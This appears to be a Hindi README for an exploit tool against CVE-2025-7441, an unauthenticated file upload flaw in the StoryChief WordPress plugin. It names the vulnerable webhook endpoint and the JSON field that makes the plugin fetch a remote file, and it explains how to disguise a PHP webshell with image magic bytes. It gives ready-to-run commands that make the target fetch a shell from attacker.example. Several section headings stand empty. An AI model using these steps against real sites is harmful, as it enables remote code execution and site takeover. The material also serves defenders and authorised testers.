
StoryChief <= 1.0.42 - अप्रमाणित मनमाना फ़ाइल अपलोड
StoryChief <= 1.0.42 - बिना प्रमाणीकरण के मनमाना फ़ाइल अपलोड
StoryChief (वर्डप्रेस प्लगिन) संस्करण 1.0.42 तक, REST एंडपॉइंट /wp-json/storychief/webhook के माध्यम से एक गंभीर बिना प्रमाणीकरण वाली मनमानी फ़ाइल अपलोड भेद्यता उजागर करता है। एक हमलावर प्लगिन को किसी हमलावर-नियंत्रित दूरस्थ संसाधन (उदाहरण के लिए, एक वेबशेल) को साइट की अपलोड निर्देशिका में लाने और संग्रहीत करने के लिए प्रेरित कर सकता है, जिससे कई डिफ़ॉल्ट वर्डप्रेस परिनियोजनों में रिमोट कोड निष्पादन संभव हो जाता है।
प्लगिन एक आने वाले JSON पेलोड (प्रकाशन इवेंट) को स्वीकार करता है जिसमें featured_image -> data -> sizes -> full फ़ील्ड किसी मनमाने URL की ओर इंगित करता है। StoryChief पर्याप्त फ़ाइल प्रकार/सामग्री सत्यापन नहीं करता है या URL स्रोत को प्रतिबंधित नहीं करता है, जिससे प्लगिन दूरस्थ संसाधन को लाकर साइट की अपलोड निर्देशिका में सहेज सकता है। निष्पादन योग्य कोड वाली फ़ाइलों को संग्रहीत करने से रोकने के लिए पर्याप्त सत्यापन नहीं है।
यह अनुभाग एक्सप्लॉइट स्क्रिप्ट (अलग से प्रदान की गई) की उच्च-स्तरीय व्याख्या करता है और प्रत्येक महत्वपूर्ण व्यवहार को अंतर्निहित भेद्यता से मैप करता है।
.php दूरस्थ फ़ाइल (उदाहरण के लिए: https://attacker.example/shell.php) का उपयोग करते समय, फ़ाइल में एक मान्य इमेज हेडर (मैजिक बाइट्स) शामिल होना चाहिए ताकि प्लगिन या इमेज-प्रोसेसिंग कोड इसे एक इमेज के रूप में स्वीकार/मान ले। मुख्य बिंदु:
प्लेसहोल्डर्स को अधिकृत लक्ष्यों से बदलें। नीचे दिए गए सभी उदाहरण .php रिमोट शेल URL का उपयोग करते हैं।
python3 CVE-2025-7441.py -u https://target.example -shell https://attacker.example/shell.php
python3 CVE-2025-7441.py -u https://target.example/wp-json/storychief/webhook -shell https://attacker.example/shell.php --debug
python3 CVE-2025-7441.py -u https://target.example -shell https://attacker.example/shell.php --use-curl
python3 CVE-2025-7441.py -u https://target.example -shell https://attacker.example/shell.php --print-only
महत्वपूर्ण फ़्लैग:
अल्पावधि:
डेवलपर मार्गदर्शन:
यह दस्तावेज़ रक्षकों और अधिकृत परीक्षकों के लिए है। इन तकनीकों का उपयोग उन प्रणालियों के विरुद्ध न करें जिनके स्वामी आप नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति आपके पास नहीं है। अनधिकृत शोषण अवैध और अनैतिक है।
यदि आप किसी विक्रेता या साइट स्वामी को समस्या की रिपोर्ट कर रहे हैं, तो पुनरुत्पादन विवरण, सुरक्षित उपचार चरण और सुझाए गए सुधार शामिल करें।